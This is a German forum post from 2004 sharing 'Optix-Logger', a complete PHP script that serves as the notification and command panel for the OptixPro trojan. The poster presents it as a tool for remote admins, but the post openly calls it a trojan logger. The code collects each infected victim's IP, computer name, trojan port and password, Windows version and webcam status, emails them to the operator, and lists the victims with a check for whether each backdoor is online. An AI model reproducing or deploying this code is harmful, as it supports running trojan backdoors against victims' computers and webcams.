php-script

Creature · Beitrag von **Creature** » 08.12.2004 20:14

hier ein php-script für remote admins und webmaster...

es speichert von einem pc gesendete strings die informationen über den pc enthalten.
es wurde zwar ursprünglich als notify-logger für einen trojaner gecodet, kann von den php-codern auf dem board aber sicher modifiziert werden.

in zeile 111 findet man die email adresse des coders -> TNO@web.de. das hat der schlingel da eingebaut um ebenfalls an die infos zu kommen...

)

nach meinen erfahrungen sollte die adresse durch eine gültige adresse ersetzt werden, sonst schrottet das script nach ner weile...

das ist der string: %I %C %S %N %TP %TPW %W %WC

%I = Includes The Computers IP
%C = Computer Name
%S = System Name
%N = Victim Name
%TP = Include The Trojan Port
%TPW = Include Trojan Password
%W = Windows Version
%WC = Detect Webcam

sollte das script hier nicht gern gesehen sein, dann ganz einfach löschen,

have fun...

Code: Alles auswählen

<?php $counter=0;
/*************************************************************************
*		Optix-Logger - PHP-Logging for OptixPro			 *
*	  	   ©2003-2004 by TrustNoOne				 *
*	   	    --> http://tn0.cjb.net <--				 *
*			  " RTFM "					 *
*************************************************************************/
$ThePass="Passwort";				//<-------- Dein Passwort
$wronguser="0";					//<-------- Benachrichtigung bei falsch eingegebenen Passwort "0"=Aus "1"=An
$option ="0";					//<-------- "0"=Log ;  "1"=Mail ; "2"=Log+Mail
$to_mail="deineMail@addresse.de";		//<-------- Deine E-Mail Addresse
$filepath="http://www.deinHost.de/";		//<------- Pfad zur Datei
$filename ="log.php";				//<-------- Name der Datei
$signature="mfg OP-Logger";			//<-------- Signatur der Mail
$from_name="OP-Logger";				//<-------- AbsenderName der Mail
$message="Ein Freund wartet auf deinen Besuch :";//<------- Überschrift in der Mail
$subject="OptixPro-Server ist Online";		//<-------- Betreff der Mail
$sep_a = "{";					//<-------- Erster Separator
$sep_b = "}";					//<-------- Zweiter Separator


/*************************************************************************
*									 *
*		Ab hier bitte nichts mehr ändern.			 *
*									 *
*************************************************************************/
$ip=$REMOTE_ADDR;
$agent=$HTTP_USER_AGENT;
$td=date("F jS");
$date=date("d.m.y");
$time=date("H:i");
$LogTime=$date." - ".$time." Uhr";


function DoLog($LogTime,$ip,$port,$user,$comp,$win,$vic,$cam,$Pwd)
{
global $filename;
global $counter;
if($counter % 2)
  {
  $span="<tr align=\"center\" bgcolor=\"#99B2FF\">";
  }
else
  { 
  $span="<tr align=\"center\" bgcolor=\"#ffffff\">";
  }
$counter=$counter+1;
$data = file($filename);
$dateianf=array_shift($data);
$fp = fopen($filename, "w");
fputs($fp,'<?php $counter='.$counter.';');
fputs($fp,"\r\n");
$content='//'.$span.'<td>'.$counter.'</td><td>'.$ip.'</td><td> '.$port.'</td><td>'.$Pwd.'</td><td> '.$user.'</td><td> '.$comp.'</td><td> '.$win.'</td><td> '.$vic.'</td><td> '.$cam.'</td><td>'.$LogTime.'</td><td><a href="'.$filepath.$filename.'?action=ping&addr='.$ip.'&port='.$port.'" target="_blank">check</td></tr>';
fputs($fp,$content);
fputs($fp,"\r\n");
foreach ($data as $data1)
fputs($fp,$data1);
fclose ($fp);
}

function SendMail($to_mail,$log,$from_name,$subject,$message,$signature)
{
$from_mail="DoNotAnswer@icq.com";
$body="\n $message \n $log\n \n ----- \n $signature";
$from="\"$from_name\" <$from_mail>";
$headers="Content-Type: text/plain; charset=iso-8859-1\nFrom: $from";
mail($to_mail,$subject,$body,$headers);
}

if ($action == "pass")
 {
  if ($pwd ==$ThePass)
   {
   $tables=file($filename);
   $toptable='<tr bgcolor="#99B2FF"><th>Nr.</th><th>IP:</th><th>Port:</th><th>Pass:</th><th>User:</th><th>Computer:</th>';
   $toptable.='<th>WindowsVersion:</th><th>Victim:</th><th>Webcam:</th><th>Datum:</th><th>Online:</th></tr>';
   echo ("<html>
<head>
</head>
<body bgcolor=\"#000000\" link=\"#ff0000\" vlink=\"#ff0000\">
<div align=\"center\">
<span style=\"font-family:Verdana; font-size:6mm; color:#3300CC;\">Optix-Logger</span></div>
<table border=\"0\" valign=\"top\" width=\"100%\">
<tr>
<td align=\"left\" valign=\"bottom\"><a href=\"log.php?action=save\">Speichern unter</a></td>
<td align=\"right\" valign=\"bottom\"><a href=\"log.php?action=delall\">alle löschen</a></td></tr></table>
<table border=\"1\" valign=\"top\" width=\"100%\" bgcolor=\"#99B2FF\">
<colgroup>
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
</colgroup>
$toptable");

   $counter=$counter+1;
   for ($x=1;$x<$counter;$x++)
    {
     $tables[$x]=ereg_replace("//", "", $tables[$x]);
     echo "$tables[$x]";
    }
   echo ("</table>
<span style=\"font-family:Verdana; font-size:3mm; color:#e0e0e0;\">
<p align=\"center\" style=\"margin-top:2cm\">©2003-2004 by <a href=\"mailto:tno@lycos.de?subject=Optix-Logger\">
<b><span style=\"font-family:Comic; font-size:3mm; color:#0000ff;\">T</span>
<span style=\"font-family:Comic; font-size:3mm; color:#CC0033;\">N</span>
<span style=\"font-family:Comic; font-size:3mm; color:#0000ff;\">O</span>
</b></a></p>
</body>
</html>"); 
   }
  else
   {
    if ($wronguser == "0")
     {
    echo "<p align=center>Falsches Passwort</p>";
    echo "<form method=POST action=log.php?action=pass>";
    echo "<p align=center>Bitte Passwort eingeben</p>";
    echo "<p align=center><input type=password name=pwd size=20></p>";
    echo "<p align=center><input type=submit value=Ok name=B1></p>";
    echo "</form>";
     }
     if ($wronguser == "1")
     {
     $warn="Warnung:";
     $warn1="Ein User mit der IP: $ip und dem Browser: $agent hat am $date um $time Uhr versucht sich mit falschem Passwort einzuloggen !";
     SendMail($to_mail,$warn1,$from_name,"Versuchter Zugriff auf Optix-Logger",$warn,"mfg\n Optix-Logger");
     echo "<p align=center>Falsches Passwort</p>";
    echo "<form method=POST action=log.php?action=pass>";
    echo "<p align=center>Bitte Passwort eingeben</p>";
    echo "<p align=center><input type=password name=pwd size=20></p>";
    echo "<p align=center><input type=submit value=Ok name=B1></p>";
    echo "</form>";	
     }
   }  
  } 
if ($body > "")
{
 if ($option == "0")
  {
  $log=str_replace("_"," ",$body);
  $pattern = "/($sep_a)(.*?)($sep_b)/";
  preg_match_all($pattern, $log, $txt);
  for ($x=1;$x<8;$x++)
    {
     $txt[0][$x]=ereg_replace("{", "", $txt[0][$x]);
     $txt[0][$x]=ereg_replace("}", "", $txt[0][$x]);
     $txt[0][$x]=ereg_replace("()(.*)(:)", "", $txt[0][$x]);
    }
  DoLog($LogTime,$ip,$txt[0][4],$txt[0][2],$txt[0][1],$txt[0][6],$txt[0][3],$txt[0][7],$txt[0][5]);
  exit;
  }

 if ($option == "1")
  {
  $log=str_replace("_"," ",$body);
  $pattern = "/($sep_a)(.*?)($sep_b)/";
  preg_match_all($pattern, $log, $txt);
  for ($x=1;$x<8;$x++)
    {
     $txt[0][$x]=ereg_replace("{", "", $txt[0][$x]);
     $txt[0][$x]=ereg_replace("}", "", $txt[0][$x]);
     $txt[0][$x]=ereg_replace("()(.*)(:)", "", $txt[0][$x]);
    }  
$log1="
IP: ".$ip." 
Port: ".$txt[0][4]." 
Passwort: ".$txt[0][5]."
User: ".$txt[0][2]."
Computer: ".$txt[0][1]." 
Windows-Version: ".$txt[0][6]." 
Victim: ".$txt[0][3]."
Webcam: ".$txt[0][7]."
Datum: ".$LogTime;
  SendMail($to_mail,$log1,$from_name,$subject,$message,$signature);
  exit;
  }

 if ($option == "2")
  {
  $log=str_replace("_"," ",$body);
  $pattern = "/($sep_a)(.*?)($sep_b)/";
  preg_match_all($pattern, $log, $txt);
  for ($x=1;$x<8;$x++)
    {
     $txt[0][$x]=ereg_replace("{", "", $txt[0][$x]);
     $txt[0][$x]=ereg_replace("}", "", $txt[0][$x]);
     $txt[0][$x]=ereg_replace("()(.*)(:)", "", $txt[0][$x]);
    }
  $log1="
IP: ".$ip." 
Port: ".$txt[0][4]." 
Passwort: ".$txt[0][5]."
User: ".$txt[0][2]."
Computer: ".$txt[0][1]." 
Windows-Version: ".$txt[0][6]." 
Victim: ".$txt[0][3]."
Webcam: ".$txt[0][7]."
Datum: ".$LogTime;
  DoLog($LogTime,$ip,$txt[0][4],$txt[0][2],$txt[0][1],$txt[0][6],$txt[0][3],$txt[0][7],$txt[0][5]);
  SendMail($to_mail,$log1,$from_name,$subject,$message,$signature);
  exit;
  }
}
if ($action == "")
{
echo ("<form method=POST action=log.php?action=pass>
<p align=center>Bitte Passwort eingeben</p>
<p align=center><input type=password name=pwd size=20></p>
<p align=center><input type=submit value=Ok name=B1></p>
</form>");
}
if ($action == "delall")
{
echo ("<form method=POST action=log.php?action=delpass>
<p align=center>Bitte zur Bestätigung Passwort eingeben</p>
<p align=center><input type=password name=pwd2 size=20></p>
<p align=center><input type=submit value=Ok name=B1></p>
</form>");
}
if ($action == "delpass")
 {
  if ($pwd2 ==$ThePass)
   {
$counter=$counter+1;
$tables1=file($filename);
for ($x=0;$x<$counter;$x++)
    {
     $deltables[$x]=array_shift($tables1);
    }
$fp = fopen($filename, "w");
fputs($fp,'<?php $counter=0;');
fputs($fp,"\r\n");
foreach ($tables1 as $tables2)
fputs($fp,$tables2);
fclose ($fp);
$hpstr=$filepath.$filename."?action=pass&pwd=".$pwd2;
header("Location: $hpstr");
exit;    	
   }
 }
if ($action == "ping")
{
 $fp = fsockopen ($ip, $port, $errno, $errstr, 3);
 if (!$fp) 
 {
  echo ("<html>
<head>
</head>
<body bgcolor\"##E0E0E0\">
<p align=\"center\">Server:</p>
<span style=\"font-family:Verdana; font-size:5mm; color:#0000B2;\">
<p align=\"center\"><u>IP:</u> $addr</p>
<p align=\"center\"><u>Port:</u> $port</p></span>
<span style=\"font-family:Verdana; font-size:5mm; color:#ff0000;\">
<p align=\"center\">ist offline</p></span>
</body>
</html>");
 }
 else
 {
   echo ("<html>
<head>
</head>
<body bgcolor\"##E0E0E0\">
<p align=\"center\">Server:</p>
<span style=\"font-family:Verdana; font-size:5mm; color:#0000B2;\">
<p align=\"center\"><u>IP:</u> $addr</p>
<p align=\"center\"><u>Port:</u> $port</p></span>
<span style=\"font-family:Verdana; font-size:5mm; color:#00FF00;\">
<p align=\"center\">ist online</p></span>
</body>
</html>");
  fclose ($fp);
 }
}

if ($action == "save")
{
echo ("<form method=POST action=log.php?action=savepass>
<p align=center>Bitte zur Bestätigung Passwort eingeben</p>
<p align=center><input type=password name=pwd3 size=20></p>
<p align=center>Bitte einen Dateinamen angeben<br>(ohne Datei-Endung)</p>
<p align=center><input type=text name=dateiname size=20></p>
<p align=center><input type=submit value=Ok name=B1></p>
</form>");
}
if ($action == "savepass")
 {
  if ($pwd3 ==$ThePass)
   {
$fp = fopen($dateiname.".html", "w");
$tables=file($filename);
   $toptable='<tr bgcolor="#99B2FF"><th>Nr.</th><th>IP:</th><th>Port:</th><th>Pass:</th><th>User:</th><th>Computer:</th>';
   $toptable.='<th>WindowsVersion:</th><th>Victim:</th><th>Webcam:</th><th>Datum:</th><th>Online:</th></tr>';
   fputs($fp,"<html>
<head>
</head>
<body bgcolor=\"#000000\">
<div align=\"center\">
<span style=\"font-family:Verdana; font-size:5mm; color:#3300CC;\">Optix-Logger</span></div>
<table border=\"1\" valign=\"top\" width=\"100%\" bgcolor=\"#99B2FF\">
<colgroup>
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
</colgroup>
.$toptable");

   $counter=$counter+1;
   for ($x=1;$x<$counter;$x++)
    {
     $tables[$x]=ereg_replace("//", "", $tables[$x]);
     fputs($fp, "$tables[$x]");
    }
   fputs($fp,"</table>
<span style=\"font-family:Verdana; font-size:3mm; color:#e0e0e0;\">
<p align=\"center\" style=\"margin-top:2cm\">©2003 by <a href=\"mailto:tno@lycos.de?subject=Optix-Logger\">
<b><span style=\"font-family:Comic; font-size:3mm; color:#0000ff;\">T</span>
<span style=\"font-family:Comic; font-size:3mm; color:#CC0033;\">N</span>
<span style=\"font-family:Comic; font-size:3mm; color:#0000ff;\">O</span>
</b></a></p>
</body>
</html>");

$hpstr=$filepath.$dateiname.".html";
header("Location: $hpstr");
exit;    	
   }
 }